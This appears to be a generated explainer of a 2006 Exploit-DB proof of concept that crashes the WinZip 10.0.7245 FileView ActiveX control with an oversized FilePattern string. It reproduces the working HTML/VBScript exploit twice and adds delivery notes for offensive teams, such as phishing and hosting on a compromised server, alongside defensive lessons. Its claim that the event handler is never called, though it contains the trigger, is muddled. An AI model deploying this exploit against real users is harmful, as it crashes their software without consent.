WinZip FileView ActiveX Control Stack Overflow Explained

What this paper is

This paper is a Proof of Concept (PoC) exploit for a stack overflow vulnerability in the WinZip FileView ActiveX control, specifically version 10.0.7245. It demonstrates how an attacker could crash the application hosting this control by sending an overly long string to the FilePattern property.

Simple technical breakdown

ActiveX controls are components that can be embedded in web pages or applications to provide extra functionality. In this case, the WinZip FileView ActiveX control has a method (a function it exposes) called FilePattern. When this method is called with a string that is too long, it can overwrite a critical area of memory on the program's stack. This overwriting can lead to a crash, and in more sophisticated exploits, could be used to execute arbitrary code. This PoC focuses on demonstrating the crash.

Complete code and payload walkthrough

The provided source is an HTML file containing VBScript and an ActiveX object definition.

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
    <SCRIPT LANGUAGE="VBScript">
<!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern = 

"STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW"
end sub
-->
    </SCRIPT>
    <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
     CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
    </OBJECT>
</BODY>
</HTML>

• <HTML>, <HEAD>, <TITLE>, </TITLE>, </HEAD>, <BODY>, </BODY>, </HTML>: These are standard HTML tags that define the structure of a web page. They are present here to host the ActiveX control and the script.
• <SCRIPT LANGUAGE="VBScript"> ... </SCRIPT>: This block contains VBScript code. VBScript is a scripting language often used in older Microsoft environments.
  • <!-- ... -->: These are HTML comment tags, used here to hide the VBScript from browsers that don't support it.
  • Sub WZFILEVIEW_OnAfterItemAdd(Item) ... end sub: This defines a VBScript subroutine (a function). The name WZFILEVIEW_OnAfterItemAdd suggests it's an event handler that would be triggered when an item is added to the WZFILEVIEW object. However, in this PoC, this subroutine is never explicitly called by the HTML itself. The exploit relies on the FilePattern property being set directly.
  • WZFILEVIEW.FilePattern = "...": This is the core of the exploit. It attempts to set the FilePattern property of the WZFILEVIEW object.
    • "STACKBASEDOVERFLOWSTACKBASEDOVERFLOW...": This is a very long string composed of repeating "STACKBASEDOVERFLOW". This string is designed to be much larger than the buffer allocated on the stack to hold the FilePattern value. When this excessively long string is assigned, it overflows the buffer, overwriting adjacent memory on the stack. This can corrupt critical data, such as return addresses, leading to a program crash.
• <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200 CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904"> </OBJECT>: This HTML tag embeds an ActiveX control into the page.
  • ID="WZFILEVIEW": Assigns a programmatic identifier to the object, allowing scripts to reference it.
  • WIDTH=200 HEIGHT=200: Sets the display dimensions of the ActiveX control on the page.
  • CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904": This is a unique identifier for the specific ActiveX control. The CLSID A09AE68F-B14D-43ED-B713-BA413F034904 points to the WinZip FileView ActiveX control.

Mapping of code fragments to practical purpose:

• WZFILEVIEW.FilePattern = "...": Purpose: Trigger the vulnerability by assigning an oversized string to the FilePattern property. This is the direct action that causes the stack overflow.
• CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904": Purpose: Identify and instantiate the vulnerable WinZip FileView ActiveX control.

Payload/Shellcode:

There is no explicit shellcode or multi-stage payload in this PoC. The "payload" is simply the excessively long string designed to cause a stack buffer overflow, leading to a denial-of-service (crash) of the application hosting the ActiveX control.

Practical details for offensive operations teams

• Required Access Level: Typically, this exploit would be delivered via a web page or a document that can host ActiveX controls. This means the target user needs to be able to browse to a malicious URL or open a specially crafted file. No elevated privileges are required on the target system itself, beyond the ability to run the application hosting the ActiveX control (e.g., Internet Explorer, or an application that embeds it).
• Lab Preconditions:
  • A vulnerable version of WinZip installed on the target machine.
  • An application that uses the WinZip FileView ActiveX control (e.g., older versions of Internet Explorer, or custom applications that embed it).
  • The target machine must have the ActiveX control registered.
• Tooling Assumptions:
  • A web server to host the HTML PoC file.
  • A web browser capable of rendering HTML and executing VBScript (e.g., Internet Explorer 6 or earlier, as later versions had enhanced security for ActiveX).
  • A text editor to create the HTML PoC.
• Execution Pitfalls:
  • Browser Security Settings: Modern browsers, and even older ones with updated security patches, will likely block or prompt the user before allowing an ActiveX control to run, especially one with a known vulnerability. This PoC would likely fail if the user denies the ActiveX prompt.
  • ActiveX Registration: The control must be installed and registered on the target system. If it's not present, the <OBJECT> tag will fail to instantiate the control.
  • Control Version: The exploit is specific to WinZip 10.0.7245. Other versions might not be vulnerable or might have different CLSIDs.
  • Environment Differences: The exact behavior and the size of the overflow required might vary slightly depending on the operating system version, service packs, and the specific application hosting the ActiveX control.
• Telemetry:
  • Network: HTTP requests to the web server hosting the PoC.
  • Process: Creation of the hosting application process (e.g., iexplore.exe).
  • Application Crash: The hosting application (e.g., Internet Explorer) will likely terminate unexpectedly. Windows Event Viewer might log an Application Error.
  • Memory Corruption: Debugging tools attached to the process might show stack corruption or an access violation.

Where this was used and when

This exploit was published in 2006. ActiveX vulnerabilities were prevalent in the early to mid-2000s, particularly when used with Internet Explorer. Such vulnerabilities were commonly exploited through malicious websites or email attachments that embedded these controls. The specific context would be an attacker hosting this HTML file on a compromised web server or sending it as part of a phishing campaign.

Defensive lessons for modern teams

• Avoid Legacy Technologies: ActiveX is an outdated and insecure technology. Modern web development should not rely on it.
• Patch Management: Keeping software, including applications that might host ActiveX controls (like older browsers), up-to-date is crucial. However, the primary defense here is to move away from the vulnerable technology.
• Browser Security Sandboxing: Modern browsers employ strong sandboxing mechanisms that isolate web content and prevent it from directly interacting with the operating system or vulnerable components like ActiveX controls.
• Application Whitelisting: Restricting which applications and components can run on a system can prevent unauthorized ActiveX controls from being loaded.
• Web Application Firewalls (WAFs): While less effective against client-side exploits like this, WAFs can help block access to known malicious URLs.
• Endpoint Detection and Response (EDR): EDR solutions can detect process crashes, suspicious memory activity, and network connections to malicious sites, providing visibility into potential exploitation attempts.

ASCII visual (if applicable)

This exploit is client-side and relies on the interaction between a web page and a vulnerable ActiveX control within a hosting application. A simple visual representation:

+---------------------+      +-----------------------+      +-----------------------+
| Attacker's Web      |----->| Target User's Browser |----->| Hosting Application   |
| Server (PoC HTML)   |      | (e.g., IE)            |      | (e.g., IE, WinZip)    |
+---------------------+      +-----------------------+      +----------+------------+
                                                                       |
                                                                       | Instantiates
                                                                       | Vulnerable
                                                                       | ActiveX
                                                                       v
                                                              +-----------------------+
                                                              | WinZip FileView       |
                                                              | ActiveX Control       |
                                                              | (Vulnerable Version)  |
                                                              +----------+------------+
                                                                         |
                                                                         | Calls vulnerable
                                                                         | FilePattern()
                                                                         | with oversized
                                                                         | string
                                                                         v
                                                              +-----------------------+
                                                              | Stack Buffer Overflow |
                                                              | -> Crash / DoS        |
                                                              +-----------------------+

Source references

• Paper ID: 2783
• Paper Title: WinZip 10.0.7245 - FileView ActiveX Control Stack Overflow (PoC)
• Author: prdelka
• Published: 2006-11-14
• Keywords: Windows, dos
• Paper URL: https://www.exploit-db.com/papers/2783
• Raw URL: https://www.exploit-db.com/raw/2783

Original Exploit-DB Content (Verbatim)

<!--
WinZip FileView ActiveX Control Unsafe Method Exposure Vulnerability
-- prdelka
-->

<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
    <SCRIPT LANGUAGE="VBScript">
<!--
Sub WZFILEVIEW_OnAfterItemAdd(Item)
WZFILEVIEW.FilePattern = 

"STACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBAS

EDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLO

WSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOWSTACKBASEDOVERFLOW"
end sub
-->
    </SCRIPT>
    <OBJECT ID="WZFILEVIEW" WIDTH=200 HEIGHT=200
     CLASSID="CLSID:A09AE68F-B14D-43ED-B713-BA413F034904">
    </OBJECT>
</BODY>
</HTML>

# milw0rm.com [2006-11-14]